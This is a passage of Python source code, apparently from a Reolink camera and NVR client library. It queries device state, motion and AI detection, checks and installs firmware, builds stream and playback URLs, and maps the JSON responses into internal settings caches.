\"param\": {\"channel\": channel}},\n {\"cmd\": \"GetFtpV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetRecV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAudioAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetMdAlarm\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n )\n else:\n ch_body.extend(\n [\n {\"cmd\": \"GetEmail\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetPush\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetFtp\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetRec\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAudioAlarm\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAlarm\", \"action\": 0, \"param\": {\"Alarm\": {\"channel\": channel, \"type\": \"md\"}}},\n ]\n )\n\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not body:\n _LOGGER.debug(\n \"Host %s:%s: get_host_data, no channels connected so skipping channel specific requests.\",\n self._host,\n self._port,\n )\n return\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Channel-settings: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: returned no data when obtaining initial channel-settings\") from err\n\n self.map_channels_json_response(json_data, channels)\n\n # Let's assume all channels of an NVR or multichannel-camera always have the same versions of commands... Not sure though...\n def check_command_exists(cmd: str) -> int:\n for x in json_data:\n if x[\"cmd\"] == cmd:\n return 1\n return 0\n\n self._api_version[\"GetEvents\"] = check_command_exists(\"GetEvents\")\n self._api_version[\"GetWhiteLed\"] = check_command_exists(\"GetWhiteLed\")\n self._api_version[\"GetAudioCfg\"] = check_command_exists(\"GetAudioCfg\")\n self._api_version[\"GetPtzGuard\"] = check_command_exists(\"GetPtzGuard\")\n self._api_version[\"GetPtzCurPos\"] = check_command_exists(\"GetPtzCurPos\")\n if self.api_version(\"scheduleVersion\") >= 1:\n self._api_version[\"GetEmail\"] = check_command_exists(\"GetEmailV20\")\n self._api_version[\"GetPush\"] = check_command_exists(\"GetPushV20\")\n self._api_version[\"GetFtp\"] = check_command_exists(\"GetFtpV20\")\n self._api_version[\"GetRec\"] = check_command_exists(\"GetRecV20\")\n self._api_version[\"GetAudioAlarm\"] = check_command_exists(\"GetAudioAlarmV20\")\n self._api_version[\"GetMdAlarm\"] = check_command_exists(\"GetMdAlarm\")\n else:\n self._api_version[\"GetEmail\"] = 0\n self._api_version[\"GetPush\"] = 0\n self._api_version[\"GetFtp\"] = 0\n self._api_version[\"GetRec\"] = 0\n self._api_version[\"GetAudioAlarm\"] = 0\n self._api_version[\"GetMdAlarm\"] = 0\n\n self.construct_capabilities()\n\n async def get_motion_state(self, channel: int) -> Optional[bool]:\n if channel not in self._channels:\n return None\n\n body = [{\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError:\n _LOGGER.error(\n \"Host %s:%s: error translating motion detection state response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._motion_detection_states[channel] = False\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining motion state 
response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._motion_detection_states[channel] = False\n return False\n\n self.map_channel_json_response(json_data, channel)\n\n return None if channel not in self._motion_detection_states else self._motion_detection_states[channel]\n\n async def get_ai_state(self, channel: int) -> Optional[dict[str, bool]]:\n if channel not in self._channels:\n return None\n\n body = [{\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError:\n _LOGGER.error(\n \"Host %s:%s: error translating AI detection state response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._ai_detection_states[channel] = {}\n return None\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining AI detection state response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._ai_detection_states[channel] = {}\n return None\n\n self.map_channel_json_response(json_data, channel)\n\n return (\n None\n if self._ai_detection_states is None or channel not in self._ai_detection_states or self._ai_detection_states[channel] is None\n else self._ai_detection_states[channel]\n )\n\n async def get_ai_state_all_ch(self) -> bool:\n \"\"\"Fetch Ai and visitor state all channels at once (AI + visitor).\"\"\"\n body = []\n channels = []\n for channel in self._channels:\n if self.api_version(\"GetEvents\") >= 1:\n ch_body = [{\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n if not self.ai_supported(channel):\n continue\n ch_body = [{\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not body:\n _LOGGER.warning(\n \"Host %s:%s: get_ai_state_all_ch called while none of the channels support AI detection\",\n self._host,\n self._port,\n )\n return False\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n _LOGGER.error(\n \"Host %s:%s: error translating AI states all channel response: %s\",\n self._host,\n self._port,\n str(err),\n )\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining AI states all channel response.\",\n self._host,\n self._port,\n )\n return False\n\n self.map_channels_json_response(json_data, channels)\n return True\n\n async def get_all_motion_states(self, channel: int) -> Optional[bool]:\n \"\"\"Fetch All motions states at once (regular + AI + visitor).\"\"\"\n if channel not in self._channels:\n return None\n\n if self.api_version(\"GetEvents\") >= 1:\n body = [{\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n body = [{\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n if self.ai_supported(channel):\n body.append({\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError:\n _LOGGER.error(\n \"Host %s:%s: error translating All Motion States response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining All Motion States response for channel %s.\",\n self._host,\n self._port,\n channel,\n 
)\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n\n self.map_channel_json_response(json_data, channel)\n\n return None if channel not in self._motion_detection_states else self._motion_detection_states[channel]\n\n async def get_motion_state_all_ch(self) -> bool:\n \"\"\"Fetch All motions states of all channels at once (regular + AI + visitor).\"\"\"\n body = []\n channels = []\n for channel in self._channels:\n if self.api_version(\"GetEvents\") >= 1:\n ch_body = [{\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n if self.ai_supported(channel):\n ch_body.append({\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}})\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not body:\n _LOGGER.debug(\n \"Host %s:%s: get_motion_state_all_ch, no channels connected so skipping request.\",\n self._host,\n self._port,\n )\n return True\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n _LOGGER.error(\n \"Host %s:%s: error translating All Motion States response: %s\",\n self._host,\n self._port,\n str(err),\n )\n for channel in self._channels:\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining All Motion States response.\",\n self._host,\n self._port,\n )\n for channel in self._channels:\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n\n self.map_channels_json_response(json_data, channels)\n return True\n\n async def _check_reolink_firmware(self) -> NewSoftwareVersion:\n \"\"\"Check for new firmware from reolink.com\"\"\"\n if self._nvr_sw_hardware_id is None or self._nvr_sw_model_id is None:\n request_URL = \"https://reolink.com/wp-json/reo-v2/download/hardware-version/selection-list\"\n json_data = await self.send_reolink_com(request_URL)\n\n for device in json_data[\"data\"]:\n if device[\"title\"] == self.hardware_version and device[\"dlProduct\"][\"title\"].startswith(self.model):\n self._nvr_sw_hardware_id = device[\"id\"]\n self._nvr_sw_model_id = device[\"dlProduct\"][\"id\"]\n break\n\n if self._nvr_sw_hardware_id is None or self._nvr_sw_model_id is None:\n raise UnexpectedDataError(f\"Could not find model '{self.model}' hardware '{self.hardware_version}' in list from reolink.com\")\n\n request_URL = f\"https://reolink.com/wp-json/reo-v2/download/firmware/?dlProductId={self._nvr_sw_model_id}&hardwareVersion={self._nvr_sw_hardware_id}&lang=en\"\n json_data = await self.send_reolink_com(request_URL)\n\n firmware_info = json_data[\"data\"][0][\"firmwares\"][0]\n hw_ver = firmware_info[\"hardwareVersion\"][0][\"title\"]\n mod_ver = firmware_info[\"hardwareVersion\"][0][\"dlProduct\"][\"title\"]\n if hw_ver != self.hardware_version or not mod_ver.startswith(self.model):\n raise UnexpectedDataError(\n f\"Hardware version of firmware info from reolink.com does not match: '{hw_ver}' != '{self.hardware_version}' or '{mod_ver}' != '{self.model}'\"\n )\n\n return NewSoftwareVersion(firmware_info[\"version\"], download_url=firmware_info[\"url\"], release_notes=firmware_info[\"new\"])\n\n async def check_new_firmware(self) -> bool | NewSoftwareVersion | str:\n \"\"\"check for new firmware using camera API, returns False if no new 
firmware available.\"\"\"\n        new_firmware = 0\n        if self.supported(None, \"update\"):\n            body: typings.reolink_json = [\n                {\"cmd\": \"CheckFirmware\"},\n                {\"cmd\": \"GetDevInfo\", \"action\": 0, \"param\": {}},\n            ]\n\n            try:\n                json_data = await self.send(body, expected_response_type=\"json\")\n            except InvalidContentTypeError as err:\n                raise InvalidContentTypeError(f\"Check firmware: {str(err)}\") from err\n            except NoDataError as err:\n                raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining CheckFirmware response\") from err\n\n            self.map_host_json_response(json_data)\n\n            try:\n                new_firmware = json_data[0][\"value\"][\"newFirmware\"]\n            except KeyError as err:\n                raise UnexpectedDataError(f\"Host {self._host}:{self._port}: received an unexpected response from check_new_firmware: {json_data}\") from err\n\n        try:\n            latest_software_version = await self._check_reolink_firmware()\n        except ReolinkError as err:\n            _LOGGER.debug(err)\n            if new_firmware == 0:\n                return False\n            if new_firmware == 1:\n                return \"New firmware available\"\n            return str(new_firmware)\n\n        if self._nvr_sw_version_object is None or self._nvr_sw_version_object >= latest_software_version:\n            if new_firmware == 0:\n                return False\n            if new_firmware == 1:\n                return \"New firmware available\"\n            return str(new_firmware)\n\n        latest_software_version.online_update_available = new_firmware == 1\n        return latest_software_version\n\n    async def update_firmware(self) -> None:\n        \"\"\"Start the online firmware upgrade.\"\"\"\n        if not self.supported(None, \"update\"):\n            raise NotSupportedError(f\"update_firmware: not supported by {self.nvr_name}\")\n\n        body = [{\"cmd\": \"UpgradeOnline\"}]\n        await self.send_setting(body)\n\n    async def update_progress(self) -> bool | int:\n        \"\"\"Check the progress of a firmware update, returns False if no update is in progress.\"\"\"\n        if not self.supported(None, \"update\"):\n            raise NotSupportedError(f\"update_progress: not supported by {self.nvr_name}\")\n\n        body = [{\"cmd\": \"UpgradeStatus\"}]\n\n        try:\n            json_data = await self.send(body, expected_response_type=\"json\")\n        except InvalidContentTypeError as err:\n            raise InvalidContentTypeError(f\"Update progress: {str(err)}\") from err\n        except NoDataError as err:\n            raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining update progress response\") from err\n\n        if json_data[0][\"code\"] != 0:\n            return False\n\n        # \"Persent\" is the key name as returned by the device firmware.\n        return json_data[0][\"value\"][\"Status\"][\"Persent\"]\n\n    async def reboot(self) -> None:\n        \"\"\"Reboot the camera.\"\"\"\n        if not self.supported(None, \"reboot\"):\n            raise NotSupportedError(f\"Reboot: not supported by {self.nvr_name}\")\n\n        body = [{\"cmd\": \"Reboot\"}]\n        json_data = await self.send(body, expected_response_type=\"json\")\n\n        if json_data[0][\"code\"] != 0 or json_data[0].get(\"value\", {}).get(\"rspCode\", -1) != 200:\n            rspCode = json_data[0].get(\"value\", json_data[0][\"error\"])[\"rspCode\"]\n            detail = json_data[0].get(\"value\", json_data[0][\"error\"]).get(\"detail\", \"\")\n            raise ApiError(f\"Reboot: API returned error code {json_data[0]['code']}, response code {rspCode}/{detail}\")\n\n    async def get_snapshot(self, channel: int, stream: Optional[str] = None) -> bytes | None:\n        \"\"\"Get the still image.\"\"\"\n        if channel not in self._stream_channels:\n            return None\n\n        if stream is None:\n            stream = \"main\"\n\n        param: dict[str, Any] = {\"cmd\": \"Snap\", \"channel\": channel}\n\n        if stream.startswith(\"autotrack_\"):\n            param[\"iLogicChannel\"] = 1\n            stream = stream.removeprefix(\"autotrack_\")\n\n        if 
stream.startswith(\"snapshots_\"):\n stream = stream.removeprefix(\"snapshots_\")\n\n if stream not in [\"main\", \"sub\"]:\n stream = \"main\"\n\n param[\"snapType\"] = stream\n\n body: typings.reolink_json = [{}]\n response = await self.send(body, param, expected_response_type=\"image/jpeg\")\n if response is None or response == b\"\":\n _LOGGER.error(\n \"Host: %s:%s: error obtaining still image response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n await self.expire_session(unsubscribe=False)\n return None\n\n return response\n\n def get_flv_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n if channel not in self._stream_channels:\n return None\n\n if stream is None:\n stream = self._stream\n\n if self._use_https:\n http_s = \"https\"\n else:\n http_s = \"http\"\n\n password = parse.quote(self._password)\n return f\"{http_s}://{self._host}:{self._port}/flv?port={self._rtmp_port}&app=bcs&stream=channel{channel}_{stream}.bcs&user={self._username}&password={password}\"\n\n def get_rtmp_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n if channel not in self._stream_channels:\n return None\n\n if stream is None:\n stream = self._stream\n\n stream_type = None\n if stream in [\"sub\", \"autotrack_sub\"]:\n stream_type = 1\n else:\n stream_type = 0\n if self._rtmp_auth_method == DEFAULT_RTMP_AUTH_METHOD:\n password = parse.quote(self._password)\n return f\"rtmp://{self._host}:{self._rtmp_port}/bcs/channel{channel}_{stream}.bcs?channel={channel}&stream={stream_type}&user={self._username}&password={password}\"\n\n return f\"rtmp://{self._host}:{self._rtmp_port}/bcs/channel{channel}_{stream}.bcs?channel={channel}&stream={stream_type}&token={self._token}\"\n\n async def get_rtsp_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n if channel not in self._stream_channels:\n return None\n\n if stream is None:\n stream = self._stream\n\n if self._is_nvr and stream == \"main\" and channel in self._rtsp_mainStream:\n return self._rtsp_mainStream[channel]\n if self._is_nvr and stream == \"sub\" and channel in self._rtsp_subStream:\n return self._rtsp_subStream[channel]\n\n if not self._enc_settings:\n try:\n await self.get_state(cmd=\"GetEnc\")\n except ReolinkError:\n pass\n\n encoding = self._enc_settings.get(channel, {}).get(\"Enc\", {}).get(f\"{stream}Stream\", {}).get(\"vType\")\n if encoding is None and stream == \"main\" and channel in self._rtsp_mainStream:\n return self._rtsp_mainStream[channel]\n\n if encoding is None and stream == \"sub\" and channel in self._rtsp_subStream:\n return self._rtsp_subStream[channel]\n\n if encoding is None and stream == \"main\":\n if self.api_version(\"mainEncType\", channel) > 0:\n encoding = \"h265\"\n else:\n encoding = \"h264\"\n\n if encoding is None:\n _LOGGER.debug(\n \"Host %s:%s rtsp stream: GetEnc incomplete, GetRtspUrl unavailable, falling back to h264 encoding for channel %i, Enc: %s\",\n self._host,\n self._port,\n channel,\n self._enc_settings,\n )\n encoding = \"h264\"\n\n password = parse.quote(self._password)\n channel_str = f\"{channel + 1:02d}\"\n\n return f\"rtsp://{self._username}:{password}@{self._host}:{self._rtsp_port}/{encoding}Preview_{channel_str}_{stream}\"\n\n async def get_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n \"\"\"Return the stream source url.\"\"\"\n try:\n await self.login()\n except LoginError:\n return None\n\n if stream is None:\n stream = self._stream\n\n if 
stream not in [\"main\", \"sub\", \"ext\", \"autotrack_sub\"]:\n return None\n if self.protocol == \"rtmp\":\n return self.get_rtmp_stream_source(channel, stream)\n if self.protocol == \"flv\" or stream == \"autotrack_sub\":\n return self.get_flv_stream_source(channel, stream)\n if self.protocol == \"rtsp\":\n return await self.get_rtsp_stream_source(channel, stream)\n return None\n\n async def get_vod_source(\n self,\n channel: int,\n filename: str,\n stream: Optional[str] = None,\n ) -> tuple[str, str]:\n \"\"\"Return the VOD source url.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"get_vod_source: no camera connected to channel '{channel}'\")\n\n # Since no request is made, make sure we are logged in.\n await self.login()\n\n if self._use_https:\n http_s = \"https\"\n else:\n http_s = \"http\"\n\n if self._is_nvr:\n # NVR VoDs \"type=0\": Adobe flv\n # NVR VoDs \"type=1\": mp4\n return (\n \"application/x-mpegURL\",\n f\"{http_s}://{self._host}:{self._port}/flv?port=1935&app=bcs&stream=playback.bcs&channel={channel}\"\n f\"&type=1&start={filename}&seek=0&user={self._username}&password={self._password}\",\n )\n\n # Alternative\n # return (\n # \"application/x-mpegURL\",\n # f\"{self._url}?&cmd=Playback&channel={channel}&source={filename}&user={self._username}&password={self._password}\",\n # )\n\n if stream is None:\n stream = self._stream\n\n stream_type: int\n if stream == \"sub\":\n stream_type = 1\n else:\n stream_type = 0\n # If the camera provides a / in the filename it needs to be encoded with %20\n # Camera VoDs are only available over rtmp, rtsp is not an option\n file = filename.replace(\"/\", \"%20\")\n # Looks like it only works with login/password method, not with token\n return (\n \"application/x-mpegURL\",\n f\"rtmp://{self._host}:{self._rtmp_port}/vod/{file}?channel={channel}&stream={stream_type}&user={self._username}&password={self._password}\",\n )\n\n async def download_vod(self, filename: str, wanted_filename: Optional[str] = None) -> typings.VOD_download:\n if wanted_filename is None:\n wanted_filename = filename.replace(\"/\", \"_\")\n\n param: dict[str, Any] = {\"cmd\": \"Download\", \"source\": filename, \"output\": wanted_filename}\n body: typings.reolink_json = [{}]\n response = await self.send(body, param, expected_response_type=\"application/octet-stream\")\n\n if response.content_length is None:\n response.release()\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: Download VOD: no 'content_length' in the response\")\n if response.content_disposition is None or response.content_disposition.filename is None:\n response.release()\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: Download VOD: no 'content_disposition.filename' in the response\")\n\n return typings.VOD_download(response.content_length, response.content_disposition.filename, response.content, response.release, response.headers.get(\"ETag\"))\n\n def map_host_json_response(self, json_data: typings.reolink_json):\n \"\"\"Map the JSON objects to internal cache-objects.\"\"\"\n for data in json_data:\n try:\n if data[\"code\"] == 1: # Error, like \"ability error\"\n continue\n\n if data[\"cmd\"] == \"GetChannelstatus\":\n if not self._GetChannelStatus_present and (self._nvr_num_channels == 0 or len(self._channels) == 0):\n self._channels.clear()\n self._is_doorbell.clear()\n\n cur_value = data[\"value\"]\n self._nvr_num_channels = cur_value[\"count\"]\n\n if self._nvr_num_channels > 0:\n cur_status = cur_value[\"status\"]\n\n # Not all Reolink 
devices respond with \"name\" attribute.\n if \"name\" in cur_status[0]:\n self._GetChannelStatus_has_name = True\n self._channel_names.clear()\n else:\n self._GetChannelStatus_has_name = False\n\n for ch_info in cur_status:\n if ch_info[\"online\"] == 1:\n cur_channel = ch_info[\"channel\"]\n\n if self._GetChannelStatus_has_name:\n self._channel_names[cur_channel] = ch_info[\"name\"]\n\n if \"typeInfo\" in ch_info: # Not all Reolink devices respond with \"typeInfo\" attribute.\n self._channel_models[cur_channel] = ch_info[\"typeInfo\"]\n self._is_doorbell[cur_channel] = \"Doorbell\" in self._channel_models[cur_channel]\n\n self._channels.append(cur_channel)\n else:\n self._channel_names.clear()\n elif self._GetChannelStatus_has_name:\n cur_status = data[\"value\"][\"status\"]\n for ch_info in cur_status:\n if ch_info[\"online\"] == 1:\n self._channel_names[ch_info[\"channel\"]] = ch_info[\"name\"]\n\n if not self._GetChannelStatus_present:\n self._GetChannelStatus_present = True\n\n break\n\n except Exception as err: # pylint: disable=bare-except\n _LOGGER.error(\n \"Host %s:%s failed mapping JSON data: %s, traceback:\\n%s\\n\",\n self._host,\n self._port,\n str(err),\n traceback.format_exc(),\n )\n continue\n\n for data in json_data:\n try:\n if data[\"code\"] == 1: # Error, like \"ability error\"\n continue\n\n if data[\"cmd\"] == \"GetDevInfo\":\n dev_info = data[\"value\"][\"DevInfo\"]\n self._is_nvr = dev_info.get(\"exactType\", \"CAM\") == \"NVR\"\n self._nvr_serial = dev_info[\"serial\"]\n self._nvr_name = dev_info[\"name\"]\n self._nvr_model = dev_info[\"model\"]\n self._nvr_hw_version = dev_info[\"hardVer\"]\n self._nvr_sw_version = dev_info[\"firmVer\"]\n if self._nvr_sw_version is not None:\n self._nvr_sw_version_object = SoftwareVersion(self._nvr_sw_version)\n\n # In case the \"GetChannelStatus\" command not supported by the device.\n if not self._GetChannelStatus_present and self._nvr_num_channels == 0:\n self._channels.clear()\n\n self._nvr_num_channels = dev_info[\"channelNum\"]\n\n if self._is_nvr:\n _LOGGER.warning(\n \"Your %s NVR doesn't support the 'Getchannelstatus' command. 
\"\n \"Probably you need to update your firmware.\\n\"\n \"No way to recognize active channels, all %s channels will be considered 'active' as a result\",\n self._nvr_name,\n self._nvr_num_channels,\n )\n\n if self._nvr_num_channels > 0:\n for ch in range(self._nvr_num_channels):\n self._channels.append(ch)\n if ch not in self._channel_models and self._nvr_model is not None:\n self._channel_models[ch] = self._nvr_model\n self._is_doorbell[ch] = \"Doorbell\" in self._nvr_model\n\n elif data[\"cmd\"] == \"GetHddInfo\":\n self._hdd_info = data[\"value\"][\"HddInfo\"]\n\n elif data[\"cmd\"] == \"GetLocalLink\":\n self._local_link = data[\"value\"]\n self._mac_address = data[\"value\"][\"LocalLink\"][\"mac\"]\n\n elif data[\"cmd\"] == \"GetWifiSignal\":\n self._wifi_signal = data[\"value\"][\"wifiSignal\"]\n\n elif data[\"cmd\"] == \"GetNetPort\":\n self._netport_settings = data[\"value\"]\n net_port = data[\"value\"][\"NetPort\"]\n self._rtsp_port = net_port.get(\"rtspPort\", 554)\n self._rtmp_port = net_port.get(\"rtmpPort\", 1935)\n self._onvif_port = net_port.get(\"onvifPort\", 8000)\n self._rtsp_enabled = net_port.get(\"rtspEnable\", 1) == 1\n self._rtmp_enabled = net_port.get(\"rtmpEnable\", 1) == 1\n self._onvif_enabled = net_port.get(\"onvifEnable\", 1) == 1\n self._subscribe_url = f\"http://{self._host}:{self._onvif_port}/onvif/event_service\"\n\n elif data[\"cmd\"] == \"GetUser\":\n self._users = data[\"value\"][\"User\"]\n\n elif data[\"cmd\"] == \"GetNtp\":\n self._ntp_settings = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetTime\":\n time_diffrence = (datetime.now() - reolink_time_to_datetime(data[\"value\"][\"Time\"])).total_seconds()\n if abs(time_diffrence) < 10:\n time_diffrence = 0\n self._host_time_difference = time_diffrence\n self._time_settings = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAbility\":\n self._abilities = data[\"value\"][\"Ability\"]\n\n except Exception as err: # pylint: disable=bare-except\n _LOGGER.error(\n \"Host %s:%s failed mapping JSON data: %s, traceback:\\n%s\\n\",\n self._host,\n self._port,\n str(err),\n traceback.format_exc(),\n )\n continue\n\n def map_channels_json_response(self, json_data, channels: list[int]):\n if len(json_data) != len(channels):\n _LOGGER.error(\n \"Host %s:%s error mapping response to channels, received %i responses while requesting %i responses\",\n self._host,\n self._port,\n len(json_data),\n len(channels),\n )\n return\n\n for data, channel in zip(json_data, channels):\n if channel == -1:\n self.map_host_json_response([data])\n continue\n\n self.map_channel_json_response([data], channel)\n\n def map_channel_json_response(self, json_data, channel: int):\n \"\"\"Map the JSON objects to internal cache-objects.\"\"\"\n response_channel = channel\n for data in json_data:\n try:\n if data[\"code\"] == 1: # -->Error, like \"ability error\"\n _LOGGER.debug(\"Host %s:%s received response error code: %s\", self._host, self._port, data)\n continue\n\n if data[\"cmd\"] == \"GetChnTypeInfo\":\n self._channel_models[channel] = data[\"value\"][\"typeInfo\"]\n self._is_doorbell[channel] = \"Doorbell\" in self._channel_models[channel]\n\n if data[\"cmd\"] == \"GetEvents\":\n response_channel = data[\"value\"][\"channel\"]\n if response_channel != channel:\n _LOGGER.error(\"Host %s:%s: GetEvents response channel %s does not equal requested channel %s\", self._host, self._port, response_channel, channel)\n continue\n if \"ai\" in data[\"value\"]:\n self._ai_detection_states[channel] = {}\n self._ai_detection_support[channel] = {}\n 
for key, value in data[\"value\"][\"ai\"].items():\n supported: bool = value.get(\"support\", 0) == 1\n self._ai_detection_states[channel][key] = supported and value.get(\"alarm_state\", 0) == 1\n self._ai_detection_support[channel][key] = supported\n if \"md\" in data[\"value\"]:\n self._motion_detection_states[channel] = data[\"value\"][\"md\"][\"alarm_state\"] == 1\n if \"visitor\" in data[\"value\"]:\n value = data[\"value\"][\"visitor\"]\n supported = value.get(\"support\", 0) == 1\n self._visitor_states[channel] = supported and value.get(\"alarm_state\", 0) == 1\n self._is_doorbell[channel] = supported\n\n elif data[\"cmd\"] == \"GetMdState\":\n self._motion_detection_states[channel] = data[\"value\"][\"state\"] == 1\n\n elif data[\"cmd\"] == \"GetAlarm\":\n self._md_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetMdAlarm\":\n self._md_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAiAlarm\":\n ai_type = data[\"value\"][\"AiAlarm\"][\"ai_type\"]\n if channel not in self._ai_alarm_settings:\n self._ai_alarm_settings[channel] = {}\n self._ai_alarm_settings[channel][ai_type] = data[\"value\"][\"AiAlarm\"]\n\n elif data[\"cmd\"] == \"GetAiState\":\n self._ai_detection_states[channel] = {}\n self._ai_detection_support[channel] = {}\n response_channel = data[\"value\"].get(\"channel\", channel)\n if response_channel != channel:\n _LOGGER.error(\"Host %s:%s: GetAiState response channel %s does not equal requested channel %s\", self._host, self._port, response_channel, channel)\n continue\n\n for key, value in data[\"value\"].items():\n if key == \"channel\":\n continue\n\n if isinstance(value, int): # compatibility with firmware < 3.0.0-494\n self._ai_detection_states[channel][key] = value == 1\n self._ai_detection_support[channel][key] = True\n else:\n # from firmware 3.0.0.0-494 there is a new json structure:\n # [\n # {\n # \"cmd\" : \"GetAiState\",\n # \"code\" : 0,\n # \"value\" : {\n # \"channel\" : 0,\n # \"face\" : {\n # \"alarm_state\" : 0,\n # \"support\" : 0\n # },\n # \"people\" : {\n # \"alarm_state\" : 0,\n # \"support\" : 1\n # },\n # \"vehicle\" : {\n # \"alarm_state\" : 0,\n # \"support\" : 1\n # }\n # }\n # }\n # ]\n supported = value.get(\"support\", 0) == 1\n self._ai_detection_states[channel][key] = supported and value.get(\"alarm_state\", 0) == 1\n self._ai_detection_support[channel][key] = supported\n\n elif data[\"cmd\"] == \"GetOsd\":\n response_channel = data[\"value\"][\"Osd\"][\"channel\"]\n self._osd_settings[channel] = data[\"value\"]\n if not self._GetChannelStatus_present or not self._GetChannelStatus_has_name:\n self._channel_names[channel] = data[\"value\"][\"Osd\"][\"osdChannel\"][\"name\"]\n\n elif data[\"cmd\"] == \"GetFtp\":\n self._ftp_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetFtpV20\":\n self._ftp_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPush\":\n self._push_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPushV20\":\n self._push_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetEnc\":\n # GetEnc returns incorrect channel for DUO camera\n # response_channel = data[\"value\"][\"Enc\"][\"channel\"]\n self._enc_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetRtspUrl\":\n response_channel = data[\"value\"][\"rtspUrl\"][\"channel\"]\n password = parse.quote(self._password)\n mainStream = data[\"value\"][\"rtspUrl\"][\"mainStream\"]\n subStream = data[\"value\"][\"rtspUrl\"][\"subStream\"]\n 
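# The URLs reported by GetRtspUrl are rewritten below to embed the username and the URL-quoted\n                    # password, so the cached value can be handed to a player directly.\n                    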
self._rtsp_mainStream[channel] = mainStream.replace(\"rtsp://\", f\"rtsp://{self._username}:{password}@\")\n self._rtsp_subStream[channel] = subStream.replace(\"rtsp://\", f\"rtsp://{self._username}:{password}@\")\n\n elif data[\"cmd\"] == \"GetEmail\":\n self._email_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetEmailV20\":\n self._email_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetBuzzerAlarmV20\":\n self._buzzer_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetIsp\":\n response_channel = data[\"value\"][\"Isp\"][\"channel\"]\n self._isp_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetIrLights\":\n self._ir_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPowerLed\":\n # GetPowerLed returns incorrect channel\n # response_channel = data[\"value\"][\"PowerLed\"][\"channel\"]\n self._status_led_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetWhiteLed\":\n response_channel = data[\"value\"][\"WhiteLed\"][\"channel\"]\n self._whiteled_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetRec\":\n self._recording_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == 